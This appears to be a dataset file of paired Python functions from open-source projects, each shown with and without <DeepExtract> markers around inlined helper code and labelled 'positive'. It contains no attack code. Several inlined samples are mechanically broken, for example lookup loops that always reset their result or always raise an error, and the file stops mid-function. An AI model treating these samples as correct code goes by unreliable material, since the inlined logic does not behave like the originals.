exitcode = _main(fd)
sys.exit(exitcode)
</DeepExtract>
sys.exit()
|
def freeze_support():
"""
Run code for process object if this in not the main process
"""
if is_forking(sys.argv):
kwds = {}
for arg in sys.argv[2:]:
(name, value) = arg.split('=')
if value == 'None':
kwds[name] = None
else:
kwds[name] = int(value)
assert is_forking(sys.argv)
if sys.platform == 'win32':
import msvcrt
from .reduction import steal_handle
new_handle = steal_handle(parent_pid, pipe_handle)
fd = msvcrt.open_osfhandle(new_handle, os.O_RDONLY)
else:
from . import semaphore_tracker
semaphore_tracker._semaphore_tracker._fd = tracker_fd
fd = pipe_handle
exitcode = _main(fd)
sys.exit(exitcode)
sys.exit()
|
billiard
|
positive
|
def create(self, label, pin, sopin):
<DeepExtract>
slots = self.pkcs11.getSlotList(tokenPresent=True)
for slot in slots:
info = self.pkcs11.getTokenInfo(slot)
try:
if info.label.split('\x00')[0].strip() == label:
slot = slot
except AttributeError:
continue
slot = None
</DeepExtract>
if slot is not None:
return
slot = self.pkcs11.getSlotList(tokenPresent=True)[-1]
self.pkcs11.initToken(slot, sopin, label)
session = self.pkcs11.openSession(slot, PyKCS11.CKF_SERIAL_SESSION | PyKCS11.CKF_RW_SESSION)
session.login(sopin, user_type=PyKCS11.CKU_SO)
session.initPin(pin)
session.logout()
session.closeSession()
|
def create(self, label, pin, sopin):
slots = self.pkcs11.getSlotList(tokenPresent=True)
for slot in slots:
info = self.pkcs11.getTokenInfo(slot)
try:
if info.label.split('\x00')[0].strip() == label:
slot = slot
except AttributeError:
continue
slot = None
if slot is not None:
return
slot = self.pkcs11.getSlotList(tokenPresent=True)[-1]
self.pkcs11.initToken(slot, sopin, label)
session = self.pkcs11.openSession(slot, PyKCS11.CKF_SERIAL_SESSION | PyKCS11.CKF_RW_SESSION)
session.login(sopin, user_type=PyKCS11.CKU_SO)
session.initPin(pin)
session.logout()
session.closeSession()
|
endesive
|
positive
|
def action_import(self, *args):
"""Handle the result of an 'open' file chooser dialog. It will then try
to import it as the selection."""
file_chooser = Gtk.FileChooserNative.new(_('Import a picture'), self, Gtk.FileChooserAction.OPEN, _('Import'), _('Cancel'))
utilities_add_filechooser_filters(file_chooser)
response = file_chooser.run()
if response == Gtk.ResponseType.ACCEPT:
<DeepExtract>
self.force_selection()
pixbuf = GdkPixbuf.Pixbuf.new_from_file(file_chooser.get_filename())
self.get_selection_tool().import_selection(pixbuf)
</DeepExtract>
file_chooser.destroy()
|
def action_import(self, *args):
"""Handle the result of an 'open' file chooser dialog. It will then try
to import it as the selection."""
file_chooser = Gtk.FileChooserNative.new(_('Import a picture'), self, Gtk.FileChooserAction.OPEN, _('Import'), _('Cancel'))
utilities_add_filechooser_filters(file_chooser)
response = file_chooser.run()
if response == Gtk.ResponseType.ACCEPT:
self.force_selection()
pixbuf = GdkPixbuf.Pixbuf.new_from_file(file_chooser.get_filename())
self.get_selection_tool().import_selection(pixbuf)
file_chooser.destroy()
|
drawing
|
positive
|
def PlotMarriageData(resp):
"""Plots hazard and survival functions.
resp: DataFrame of respondents
"""
<DeepExtract>
complete = resp[resp.evrmarry == 1].agemarry
ongoing = resp[resp.evrmarry == 0].age
hf = EstimateHazardFunction(complete, ongoing)
sf = hf.MakeSurvival()
(hf, sf) = (hf, sf)
</DeepExtract>
thinkplot.PrePlot(rows=2)
thinkplot.Plot(hf)
thinkplot.Config(legend=False)
thinkplot.SubPlot(2)
thinkplot.Plot(sf)
thinkplot.Save(root='survival2', xlabel='age (years)', ylabel='prob unmarried', ylim=[0, 1], legend=False, formats=FORMATS)
return sf
|
def PlotMarriageData(resp):
"""Plots hazard and survival functions.
resp: DataFrame of respondents
"""
complete = resp[resp.evrmarry == 1].agemarry
ongoing = resp[resp.evrmarry == 0].age
hf = EstimateHazardFunction(complete, ongoing)
sf = hf.MakeSurvival()
(hf, sf) = (hf, sf)
thinkplot.PrePlot(rows=2)
thinkplot.Plot(hf)
thinkplot.Config(legend=False)
thinkplot.SubPlot(2)
thinkplot.Plot(sf)
thinkplot.Save(root='survival2', xlabel='age (years)', ylabel='prob unmarried', ylim=[0, 1], legend=False, formats=FORMATS)
return sf
|
bayesianGameofThrones
|
positive
|
def step(self, action: Union[None, Dict[str, ActionType]]) -> bool:
"""
Run a single step of following the behavioral scheme set for this environment.
:param action: the action to apply to the agents held in this level, before beginning following
the scheme.
:return: None
"""
if action is not None:
for (agent_name, agent) in self.agents.items():
agent.set_incoming_directive(action)
if self.reset_required:
<DeepExtract>
[agent.reset_internal_state() for agent in self.agents.values()]
self.reset_required = False
if self.real_environment and self.real_environment.current_episode_steps_counter == 0:
self.last_env_response = self.real_environment.last_env_response
return self.last_env_response
</DeepExtract>
env_responses = copy.copy(self.environment.last_env_response)
if isinstance(env_responses, EnvResponse):
env_responses = [env_responses]
accumulated_rewards = [0] * len(self.agents)
for i in range(self.steps_limit.num_steps):
done = self.done_condition([agent.observe(env_response) for (agent, env_response) in zip(self.agents.values(), env_responses)])
if done:
break
else:
action_infos = [agent.act() for agent in self.agents.values()]
if any(action_infos):
env_responses = self.environment.step([action_info.action if action_info else None for action_info in action_infos])
if isinstance(env_responses, EnvResponse):
env_responses = [env_responses]
accumulated_rewards = [accumulated_reward + env_response.reward if env_response else accumulated_reward for (accumulated_reward, env_response) in zip(accumulated_rewards, env_responses)]
env_responses_for_upper_level = copy.copy(env_responses)
for (env_response_for_upper_level, accumulated_reward) in zip(env_responses_for_upper_level, accumulated_rewards):
env_response_for_upper_level.reward = accumulated_reward
self.last_env_response = env_responses_for_upper_level
done = self.done_condition((env_response.game_over for env_response in env_responses))
if done or self.should_reset_agent_state_after_time_limit_passes:
[agent.observe(env_response) for (agent, env_response) in zip(self.agents.values(), env_responses)]
<DeepExtract>
[agent.handle_episode_ended() for agent in self.agents.values()]
</DeepExtract>
self.reset_required = True
return done
|
def step(self, action: Union[None, Dict[str, ActionType]]) -> bool:
"""
Run a single step of following the behavioral scheme set for this environment.
:param action: the action to apply to the agents held in this level, before beginning following
the scheme.
:return: None
"""
if action is not None:
for (agent_name, agent) in self.agents.items():
agent.set_incoming_directive(action)
if self.reset_required:
[agent.reset_internal_state() for agent in self.agents.values()]
self.reset_required = False
if self.real_environment and self.real_environment.current_episode_steps_counter == 0:
self.last_env_response = self.real_environment.last_env_response
return self.last_env_response
env_responses = copy.copy(self.environment.last_env_response)
if isinstance(env_responses, EnvResponse):
env_responses = [env_responses]
accumulated_rewards = [0] * len(self.agents)
for i in range(self.steps_limit.num_steps):
done = self.done_condition([agent.observe(env_response) for (agent, env_response) in zip(self.agents.values(), env_responses)])
if done:
break
else:
action_infos = [agent.act() for agent in self.agents.values()]
if any(action_infos):
env_responses = self.environment.step([action_info.action if action_info else None for action_info in action_infos])
if isinstance(env_responses, EnvResponse):
env_responses = [env_responses]
accumulated_rewards = [accumulated_reward + env_response.reward if env_response else accumulated_reward for (accumulated_reward, env_response) in zip(accumulated_rewards, env_responses)]
env_responses_for_upper_level = copy.copy(env_responses)
for (env_response_for_upper_level, accumulated_reward) in zip(env_responses_for_upper_level, accumulated_rewards):
env_response_for_upper_level.reward = accumulated_reward
self.last_env_response = env_responses_for_upper_level
done = self.done_condition((env_response.game_over for env_response in env_responses))
if done or self.should_reset_agent_state_after_time_limit_passes:
[agent.observe(env_response) for (agent, env_response) in zip(self.agents.values(), env_responses)]
[agent.handle_episode_ended() for agent in self.agents.values()]
self.reset_required = True
return done
|
deepracer-local
|
positive
|
def run(self):
"""Run connector on a schedule"""
while True:
self.server.refresh()
timestamp = int(time.time())
if self.first_run:
self.helper.log_info('Connector has never run')
else:
last_run = datetime.utcfromtimestamp(self.helper.get_state()['last_run']).strftime('%Y-%m-%d %H:%M:%S')
self.helper.log_info('Connector last run: ' + last_run)
for collection in self.collections:
try:
(root_path, coll_title) = collection.split('.')
if root_path == '*':
<DeepExtract>
self.helper.log_info('Polling all API Roots')
for root in self.server.api_roots:
if coll_title == '*':
self.poll_entire_root(root)
else:
try:
coll = self._get_collection(root, coll_title)
except TAXIIServiceException:
self.helper.log_error(f'Error searching for collection {coll_title} in API Root {root.title}')
return
try:
self.poll(coll)
except TAXIIServiceException as err:
msg = f'Error trying to poll Collection {coll_title} in API Root {root.title}. Skipping'
self.helper.log_error(msg)
self.helper.log_error(err)
</DeepExtract>
elif coll_title == '*':
<DeepExtract>
for root in self.server.api_roots:
if root.url.split('/')[-2] == root_path:
root = root
msg = f'Api Root {root_path} does not exist in the TAXII server'
raise TAXIIServiceException(msg)
</DeepExtract>
<DeepExtract>
self.helper.log_info(f'Polling entire API root {root.title}')
for coll in root.collections:
try:
self.poll(coll)
except TAXIIServiceException as err:
msg = f'Error trying to poll Collection {coll.title} in API Root {root.title}. Skipping'
self.helper.log_error(msg)
self.helper.log_error(err)
</DeepExtract>
else:
<DeepExtract>
for root in self.server.api_roots:
if root.url.split('/')[-2] == root_path:
root = root
msg = f'Api Root {root_path} does not exist in the TAXII server'
raise TAXIIServiceException(msg)
</DeepExtract>
<DeepExtract>
for coll in root.collections:
if coll.title == coll_title:
coll = coll
msg = f'Collection {coll_title} does not exist in API root {root.title}'
raise TAXIIServiceException(msg)
</DeepExtract>
<DeepExtract>
filters = {}
if self.first_run:
lookback = self.initial_history or None
else:
lookback = self.interval
if lookback:
added_after = datetime.now() - timedelta(hours=lookback)
filters['added_after'] = added_after
self.helper.log_info(f'Polling Collection {coll.title}')
self.send_to_server(coll.get_objects(**filters))
</DeepExtract>
except (TAXIIServiceException, HTTPError) as err:
self.helper.log_error('Error connecting to TAXII server')
self.helper.log_error(err)
continue
self.helper.log_info(f'Run Complete. Sleeping until next run in {self.interval} hours')
self.helper.set_state({'last_run': timestamp})
if self.helper.connect_run_and_terminate:
self.helper.log_info('Connector stop')
sys.exit(0)
time.sleep(self.get_interval())
|
def run(self):
"""Run connector on a schedule"""
while True:
self.server.refresh()
timestamp = int(time.time())
if self.first_run:
self.helper.log_info('Connector has never run')
else:
last_run = datetime.utcfromtimestamp(self.helper.get_state()['last_run']).strftime('%Y-%m-%d %H:%M:%S')
self.helper.log_info('Connector last run: ' + last_run)
for collection in self.collections:
try:
(root_path, coll_title) = collection.split('.')
if root_path == '*':
self.helper.log_info('Polling all API Roots')
for root in self.server.api_roots:
if coll_title == '*':
self.poll_entire_root(root)
else:
try:
coll = self._get_collection(root, coll_title)
except TAXIIServiceException:
self.helper.log_error(f'Error searching for collection {coll_title} in API Root {root.title}')
return
try:
self.poll(coll)
except TAXIIServiceException as err:
msg = f'Error trying to poll Collection {coll_title} in API Root {root.title}. Skipping'
self.helper.log_error(msg)
self.helper.log_error(err)
elif coll_title == '*':
for root in self.server.api_roots:
if root.url.split('/')[-2] == root_path:
root = root
msg = f'Api Root {root_path} does not exist in the TAXII server'
raise TAXIIServiceException(msg)
self.helper.log_info(f'Polling entire API root {root.title}')
for coll in root.collections:
try:
self.poll(coll)
except TAXIIServiceException as err:
msg = f'Error trying to poll Collection {coll.title} in API Root {root.title}. Skipping'
self.helper.log_error(msg)
self.helper.log_error(err)
else:
for root in self.server.api_roots:
if root.url.split('/')[-2] == root_path:
root = root
msg = f'Api Root {root_path} does not exist in the TAXII server'
raise TAXIIServiceException(msg)
for coll in root.collections:
if coll.title == coll_title:
coll = coll
msg = f'Collection {coll_title} does not exist in API root {root.title}'
raise TAXIIServiceException(msg)
filters = {}
if self.first_run:
lookback = self.initial_history or None
else:
lookback = self.interval
if lookback:
added_after = datetime.now() - timedelta(hours=lookback)
filters['added_after'] = added_after
self.helper.log_info(f'Polling Collection {coll.title}')
self.send_to_server(coll.get_objects(**filters))
except (TAXIIServiceException, HTTPError) as err:
self.helper.log_error('Error connecting to TAXII server')
self.helper.log_error(err)
continue
self.helper.log_info(f'Run Complete. Sleeping until next run in {self.interval} hours')
self.helper.set_state({'last_run': timestamp})
if self.helper.connect_run_and_terminate:
self.helper.log_info('Connector stop')
sys.exit(0)
time.sleep(self.get_interval())
|
connectors
|
positive
|
def extract_result(self):
"""Extract the result from the current state.
Returns
-------
result : Sample
"""
if self.state['samples'] is None:
raise ValueError('Nothing to extract')
if self.adaptive:
<DeepExtract>
self.model[self.discrepancy_name].update_distance()
nums = self.objective['n_samples']
data = {s: self.state['samples'][s][:nums] for s in self.sums}
ds = self.model[self.discrepancy_name].generate(with_values=data)
sort_distance = np.atleast_2d(np.transpose(ds))[-1]
sort_mask = np.argsort(sort_distance)
self.state['samples'][self.discrepancy_name] = sort_distance
for k in self.state['samples'].keys():
if k != self.discrepancy_name:
self.state['samples'][k][:nums] = self.state['samples'][k][sort_mask]
self._update_state_meta()
</DeepExtract>
outputs = dict()
for (k, v) in self.state['samples'].items():
outputs[k] = v[:self.objective['n_samples']]
return Sample(outputs=outputs, **self._extract_result_kwargs())
|
def extract_result(self):
"""Extract the result from the current state.
Returns
-------
result : Sample
"""
if self.state['samples'] is None:
raise ValueError('Nothing to extract')
if self.adaptive:
self.model[self.discrepancy_name].update_distance()
nums = self.objective['n_samples']
data = {s: self.state['samples'][s][:nums] for s in self.sums}
ds = self.model[self.discrepancy_name].generate(with_values=data)
sort_distance = np.atleast_2d(np.transpose(ds))[-1]
sort_mask = np.argsort(sort_distance)
self.state['samples'][self.discrepancy_name] = sort_distance
for k in self.state['samples'].keys():
if k != self.discrepancy_name:
self.state['samples'][k][:nums] = self.state['samples'][k][sort_mask]
self._update_state_meta()
outputs = dict()
for (k, v) in self.state['samples'].items():
outputs[k] = v[:self.objective['n_samples']]
return Sample(outputs=outputs, **self._extract_result_kwargs())
|
elfi
|
positive
|
def load(self, f=None):
if self.has_checkpoint():
<DeepExtract>
save_file = os.path.join(self.save_dir, 'last_checkpoint')
try:
with open(save_file, 'r') as f:
last_saved = f.read()
last_saved = last_saved.strip()
except IOError:
last_saved = ''
f = last_saved
</DeepExtract>
if not f:
self.logger.info('No checkpoint found. Initializing model from scratch')
return {}
self.logger.info('Loading checkpoint from {}'.format(f))
<DeepExtract>
checkpoint = torch.load(f, map_location=torch.device('cpu'))
</DeepExtract>
<DeepExtract>
load_state_dict(self.model, checkpoint.pop('model'))
</DeepExtract>
if 'optimizer' in checkpoint and self.optimizer:
self.logger.info('Loading optimizer from {}'.format(f))
self.optimizer.load_state_dict(checkpoint.pop('optimizer'))
if 'scheduler' in checkpoint and self.scheduler:
self.logger.info('Loading scheduler from {}'.format(f))
self.scheduler.load_state_dict(checkpoint.pop('scheduler'))
return checkpoint
|
def load(self, f=None):
if self.has_checkpoint():
save_file = os.path.join(self.save_dir, 'last_checkpoint')
try:
with open(save_file, 'r') as f:
last_saved = f.read()
last_saved = last_saved.strip()
except IOError:
last_saved = ''
f = last_saved
if not f:
self.logger.info('No checkpoint found. Initializing model from scratch')
return {}
self.logger.info('Loading checkpoint from {}'.format(f))
checkpoint = torch.load(f, map_location=torch.device('cpu'))
load_state_dict(self.model, checkpoint.pop('model'))
if 'optimizer' in checkpoint and self.optimizer:
self.logger.info('Loading optimizer from {}'.format(f))
self.optimizer.load_state_dict(checkpoint.pop('optimizer'))
if 'scheduler' in checkpoint and self.scheduler:
self.logger.info('Loading scheduler from {}'.format(f))
self.scheduler.load_state_dict(checkpoint.pop('scheduler'))
return checkpoint
|
Box_Discretization_Network
|
positive
|
def __exit__(self, *args):
"""Support with-statement for the environment. """
<DeepExtract>
pass
</DeepExtract>
return False
|
def __exit__(self, *args):
"""Support with-statement for the environment. """
pass
return False
|
DQN-DDPG_Stock_Trading
|
positive
|
def find_path(self, target_location):
"""Returns the direction to move in, to (hopefully) reach the target
location (or None if the robot is completely stuck).
This is a very basic pathfinding algorithm, it looks for which empty
(non-solid) adjacent block is closest to the target location and
returns the direction for that block."""
<DeepExtract>
my_loc = self._locate(robotapi_pb2.RobotReadRequest.SELF)
</DeepExtract>
<DeepExtract>
request = robotapi_pb2.RobotRequest()
request.name = self.owner_name
self._counter += 1
request.key = self._counter
request = request
</DeepExtract>
request.read_request.locate_nonsolid_nearby = True
loc_proto_list = self._action(request).location_response.locations
loc_list = [Location.from_proto(l.absolute_location) for l in loc_proto_list]
best = None
targetdist = target_location.distance(loc_list[0]) + 20
for loc in loc_list:
newdist = target_location.distance(loc)
if newdist < targetdist and my_loc.distance(loc) == 1:
best = loc
targetdist = newdist
return my_loc.direction(best)
|
def find_path(self, target_location):
"""Returns the direction to move in, to (hopefully) reach the target
location (or None if the robot is completely stuck).
This is a very basic pathfinding algorithm, it looks for which empty
(non-solid) adjacent block is closest to the target location and
returns the direction for that block."""
my_loc = self._locate(robotapi_pb2.RobotReadRequest.SELF)
request = robotapi_pb2.RobotRequest()
request.name = self.owner_name
self._counter += 1
request.key = self._counter
request = request
request.read_request.locate_nonsolid_nearby = True
loc_proto_list = self._action(request).location_response.locations
loc_list = [Location.from_proto(l.absolute_location) for l in loc_proto_list]
best = None
targetdist = target_location.distance(loc_list[0]) + 20
for loc in loc_list:
newdist = target_location.distance(loc)
if newdist < targetdist and my_loc.distance(loc) == 1:
best = loc
targetdist = newdist
return my_loc.direction(best)
|
botchallenge
|
positive
|
def testRandomCropToAspectRatio(self):
<DeepExtract>
images_r = tf.constant([[[128, 128, 128, 128], [0, 0, 128, 128], [0, 128, 128, 128], [192, 192, 128, 128]]], dtype=tf.uint8)
images_r = tf.expand_dims(images_r, 3)
images_g = tf.constant([[[0, 0, 128, 128], [0, 0, 128, 128], [0, 128, 192, 192], [192, 192, 128, 192]]], dtype=tf.uint8)
images_g = tf.expand_dims(images_g, 3)
images_b = tf.constant([[[128, 128, 192, 0], [0, 0, 128, 192], [0, 128, 128, 0], [192, 192, 192, 128]]], dtype=tf.uint8)
images_b = tf.expand_dims(images_b, 3)
images = tf.concat([images_r, images_g, images_b], 3)
images = images
</DeepExtract>
<DeepExtract>
boxes = tf.constant([[0.0, 0.25, 0.75, 1.0], [0.25, 0.5, 0.75, 1.0]], dtype=tf.float32)
boxes = boxes
</DeepExtract>
<DeepExtract>
labels = tf.constant([1, 2], dtype=tf.int32)
labels = labels
</DeepExtract>
tensor_dict = {fields.InputDataFields.image: images, fields.InputDataFields.groundtruth_boxes: boxes, fields.InputDataFields.groundtruth_classes: labels}
tensor_dict = preprocessor.preprocess(tensor_dict, [])
images = tensor_dict[fields.InputDataFields.image]
preprocessing_options = [(preprocessor.random_crop_to_aspect_ratio, {'aspect_ratio': 2.0})]
cropped_tensor_dict = preprocessor.preprocess(tensor_dict, preprocessing_options)
cropped_images = cropped_tensor_dict[fields.InputDataFields.image]
cropped_boxes = cropped_tensor_dict[fields.InputDataFields.groundtruth_boxes]
boxes_shape = tf.shape(boxes)
cropped_boxes_shape = tf.shape(cropped_boxes)
images_shape = tf.shape(images)
cropped_images_shape = tf.shape(cropped_images)
with self.test_session() as sess:
(boxes_shape_, cropped_boxes_shape_, images_shape_, cropped_images_shape_) = sess.run([boxes_shape, cropped_boxes_shape, images_shape, cropped_images_shape])
self.assertAllEqual(boxes_shape_, cropped_boxes_shape_)
self.assertEqual(images_shape_[1], cropped_images_shape_[1] * 2)
self.assertEqual(images_shape_[2], cropped_images_shape_[2])
|
def testRandomCropToAspectRatio(self):
images_r = tf.constant([[[128, 128, 128, 128], [0, 0, 128, 128], [0, 128, 128, 128], [192, 192, 128, 128]]], dtype=tf.uint8)
images_r = tf.expand_dims(images_r, 3)
images_g = tf.constant([[[0, 0, 128, 128], [0, 0, 128, 128], [0, 128, 192, 192], [192, 192, 128, 192]]], dtype=tf.uint8)
images_g = tf.expand_dims(images_g, 3)
images_b = tf.constant([[[128, 128, 192, 0], [0, 0, 128, 192], [0, 128, 128, 0], [192, 192, 192, 128]]], dtype=tf.uint8)
images_b = tf.expand_dims(images_b, 3)
images = tf.concat([images_r, images_g, images_b], 3)
images = images
boxes = tf.constant([[0.0, 0.25, 0.75, 1.0], [0.25, 0.5, 0.75, 1.0]], dtype=tf.float32)
boxes = boxes
labels = tf.constant([1, 2], dtype=tf.int32)
labels = labels
tensor_dict = {fields.InputDataFields.image: images, fields.InputDataFields.groundtruth_boxes: boxes, fields.InputDataFields.groundtruth_classes: labels}
tensor_dict = preprocessor.preprocess(tensor_dict, [])
images = tensor_dict[fields.InputDataFields.image]
preprocessing_options = [(preprocessor.random_crop_to_aspect_ratio, {'aspect_ratio': 2.0})]
cropped_tensor_dict = preprocessor.preprocess(tensor_dict, preprocessing_options)
cropped_images = cropped_tensor_dict[fields.InputDataFields.image]
cropped_boxes = cropped_tensor_dict[fields.InputDataFields.groundtruth_boxes]
boxes_shape = tf.shape(boxes)
cropped_boxes_shape = tf.shape(cropped_boxes)
images_shape = tf.shape(images)
cropped_images_shape = tf.shape(cropped_images)
with self.test_session() as sess:
(boxes_shape_, cropped_boxes_shape_, images_shape_, cropped_images_shape_) = sess.run([boxes_shape, cropped_boxes_shape, images_shape, cropped_images_shape])
self.assertAllEqual(boxes_shape_, cropped_boxes_shape_)
self.assertEqual(images_shape_[1], cropped_images_shape_[1] * 2)
self.assertEqual(images_shape_[2], cropped_images_shape_[2])
|
Accident-Detection-on-Indian-Roads
|
positive
|
def test_deserialize_None(self):
<DeepExtract>
from colander import Invalid
exc = Invalid(node, msg, val)
typ = exc
</DeepExtract>
node = DummySchemaNode(None)
result = typ.deserialize(node, None)
self.assertEqual(result, colander.null)
|
def test_deserialize_None(self):
from colander import Invalid
exc = Invalid(node, msg, val)
typ = exc
node = DummySchemaNode(None)
result = typ.deserialize(node, None)
self.assertEqual(result, colander.null)
|
colander
|
positive
|
@pytest.mark.end2end
@pytest.mark.vcr
def test_upcoming_events_add_new_group__does_not_exist(self, login_client, factory, patch_slack):
config = factory.UpcomingEventsConfiguration(enabled=True)
slack_user = factory.SlackUser(installation=config.slack_installation)
<DeepExtract>
def _patch_slack(*, is_admin=None):
obj = FakeSlackClient(is_admin=True)
patcher(MODULE_TO_TEST, namespace='SlackClient', replacement=obj)
return obj
return _patch_slack
</DeepExtract>
client = login_client(user=slack_user)
rv = client.post('/settings/upcoming-events/group', data={'meetup_urlname': 'adsfasdfeum3n4x'}, follow_redirects=True)
assert rv.status_code == 200
assert b'Group does not exist' in rv.data
groups = UpcomingEventsGroup.query.all()
assert len(groups) == 0
|
@pytest.mark.end2end
@pytest.mark.vcr
def test_upcoming_events_add_new_group__does_not_exist(self, login_client, factory, patch_slack):
config = factory.UpcomingEventsConfiguration(enabled=True)
slack_user = factory.SlackUser(installation=config.slack_installation)
def _patch_slack(*, is_admin=None):
obj = FakeSlackClient(is_admin=True)
patcher(MODULE_TO_TEST, namespace='SlackClient', replacement=obj)
return obj
return _patch_slack
client = login_client(user=slack_user)
rv = client.post('/settings/upcoming-events/group', data={'meetup_urlname': 'adsfasdfeum3n4x'}, follow_redirects=True)
assert rv.status_code == 200
assert b'Group does not exist' in rv.data
groups = UpcomingEventsGroup.query.all()
assert len(groups) == 0
|
busy-beaver
|
positive
|
def load_data():
"""
Loads and preprocessed data for the MR dataset.
Returns input vectors, labels, vocabulary, and inverse vocabulary.
"""
<DeepExtract>
positive_examples = list(open('./data/rt-polarity.pos', encoding='ISO-8859-1').readlines())
positive_examples = [s.strip() for s in positive_examples]
negative_examples = list(open('./data/rt-polarity.neg', encoding='ISO-8859-1').readlines())
negative_examples = [s.strip() for s in negative_examples]
x_text = positive_examples + negative_examples
x_text = [clean_str(sent) for sent in x_text]
x_text = [s.split(' ') for s in x_text]
positive_labels = [[0, 1] for _ in positive_examples]
negative_labels = [[1, 0] for _ in negative_examples]
y = np.concatenate([positive_labels, negative_labels], 0)
(sentences, labels) = [x_text, y]
</DeepExtract>
<DeepExtract>
sequence_length = max((len(x) for x in sentences))
padded_sentences = []
for i in range(len(sentences)):
sentence = sentences[i]
num_padding = sequence_length - len(sentence)
new_sentence = sentence + [padding_word] * num_padding
padded_sentences.append(new_sentence)
sentences_padded = padded_sentences
</DeepExtract>
<DeepExtract>
word_counts = Counter(itertools.chain(*sentences_padded))
vocabulary_inv = [x[0] for x in word_counts.most_common()]
vocabulary = {x: i for (i, x) in enumerate(vocabulary_inv)}
(vocabulary, vocabulary_inv) = [vocabulary, vocabulary_inv]
</DeepExtract>
<DeepExtract>
x = np.array([[vocabulary[word] for word in sentence] for sentence in sentences_padded])
y = np.array(labels)
(x, y) = [x, y]
</DeepExtract>
return [x, y, vocabulary, vocabulary_inv]
|
def load_data():
"""
Loads and preprocessed data for the MR dataset.
Returns input vectors, labels, vocabulary, and inverse vocabulary.
"""
positive_examples = list(open('./data/rt-polarity.pos', encoding='ISO-8859-1').readlines())
positive_examples = [s.strip() for s in positive_examples]
negative_examples = list(open('./data/rt-polarity.neg', encoding='ISO-8859-1').readlines())
negative_examples = [s.strip() for s in negative_examples]
x_text = positive_examples + negative_examples
x_text = [clean_str(sent) for sent in x_text]
x_text = [s.split(' ') for s in x_text]
positive_labels = [[0, 1] for _ in positive_examples]
negative_labels = [[1, 0] for _ in negative_examples]
y = np.concatenate([positive_labels, negative_labels], 0)
(sentences, labels) = [x_text, y]
sequence_length = max((len(x) for x in sentences))
padded_sentences = []
for i in range(len(sentences)):
sentence = sentences[i]
num_padding = sequence_length - len(sentence)
new_sentence = sentence + [padding_word] * num_padding
padded_sentences.append(new_sentence)
sentences_padded = padded_sentences
word_counts = Counter(itertools.chain(*sentences_padded))
vocabulary_inv = [x[0] for x in word_counts.most_common()]
vocabulary = {x: i for (i, x) in enumerate(vocabulary_inv)}
(vocabulary, vocabulary_inv) = [vocabulary, vocabulary_inv]
x = np.array([[vocabulary[word] for word in sentence] for sentence in sentences_padded])
y = np.array(labels)
(x, y) = [x, y]
return [x, y, vocabulary, vocabulary_inv]
|
data-science-ipython-notebooks
|
positive
|
def roc_auc(predictions: np.ndarray, labels: np.ndarray, average: str='macro') -> np.ndarray:
""" simple wrapper around sklearn.metrics.roc_auc_score
References
-------
.. [1] https://scikit-learn.org/stable/modules/generated/sklearn.metrics.roc_auc_score.html
.. [2] https://en.wikipedia.org/wiki/Receiver_operating_characteristic
"""
if predictions.ndim == 1:
raise ValueError('Predictions must be class probabilities before max!')
if labels.ndim == 1:
<DeepExtract>
onehot = np.zeros((labels.shape[0], predictions.shape[1]), dtype=np.uint16)
onehot[np.arange(onehot.shape[0]), labels] = 1
labels = onehot
</DeepExtract>
score = roc_auc_score(labels, predictions, average=average)
return score
|
def roc_auc(predictions: np.ndarray, labels: np.ndarray, average: str='macro') -> np.ndarray:
""" simple wrapper around sklearn.metrics.roc_auc_score
References
-------
.. [1] https://scikit-learn.org/stable/modules/generated/sklearn.metrics.roc_auc_score.html
.. [2] https://en.wikipedia.org/wiki/Receiver_operating_characteristic
"""
if predictions.ndim == 1:
raise ValueError('Predictions must be class probabilities before max!')
if labels.ndim == 1:
onehot = np.zeros((labels.shape[0], predictions.shape[1]), dtype=np.uint16)
onehot[np.arange(onehot.shape[0]), labels] = 1
labels = onehot
score = roc_auc_score(labels, predictions, average=average)
return score
|
deepethogram
|
positive
|
def s3_object_do_get(module, connection, connection_v4, s3_vars):
if module.params.get('sig_v4'):
connection = connection_v4
<DeepExtract>
try:
if s3_vars['version']:
connection.head_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'], VersionId=s3_vars['version'])
else:
connection.head_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'])
except is_boto3_error_code('404'):
keyrtn = False
except is_boto3_error_code('403') as e:
if s3_vars['validate'] is True:
module.fail_json_aws(e, msg='Failed while looking up object (during key check) %s.' % s3_vars['object'])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
raise S3ObjectFailure('Failed while looking up object (during key check) %s.' % s3_vars['object'], e)
keyrtn = True
</DeepExtract>
if not keyrtn:
if s3_vars['version']:
module.fail_json(msg='Key %s with version id %s does not exist.' % (s3_vars['object'], s3_vars['version']))
module.fail_json(msg='Key %s does not exist.' % s3_vars['object'])
if s3_vars['dest'] and path_check(s3_vars['dest']) and (s3_vars['overwrite'] != 'always'):
if s3_vars['overwrite'] == 'never':
module.exit_json(msg='Local object already exists and overwrite is disabled.', changed=False)
if s3_vars['overwrite'] == 'different' and etag_compare(module, connection, s3_vars['bucket'], s3_vars['object'], version=s3_vars['version'], local_file=s3_vars['dest']):
module.exit_json(msg='Local and remote object are identical, ignoring. Use overwrite=always parameter to force.', changed=False)
if s3_vars['overwrite'] == 'latest' and is_local_object_latest(connection, s3_vars['bucket'], s3_vars['object'], version=s3_vars['version'], local_file=s3_vars['dest']):
module.exit_json(msg='Local object is latest, ignoreing. Use overwrite=always parameter to force.', changed=False)
try:
<DeepExtract>
if module.check_mode:
module.exit_json(msg='GET operation skipped - running in check mode', changed=True)
try:
if s3_vars['version']:
connection.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'], VersionId=s3_vars['version'])
else:
connection.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'])
except is_boto3_error_code(['404', '403']) as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['object'])
except is_boto3_error_message('require AWS Signature Version 4'):
raise Sigv4Required()
except is_boto3_error_code('InvalidArgument') as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['object'])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
raise S3ObjectFailure('Could not find the key %s.' % s3_vars['object'], e)
optional_kwargs = {'ExtraArgs': {'VersionId': s3_vars['version']}} if s3_vars['version'] else {}
for x in range(0, s3_vars['retries'] + 1):
try:
connection.download_file(s3_vars['bucket'], s3_vars['object'], s3_vars['dest'], aws_retry=True, **optional_kwargs)
module.exit_json(msg='GET operation complete', changed=True)
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
if x >= s3_vars['retries']:
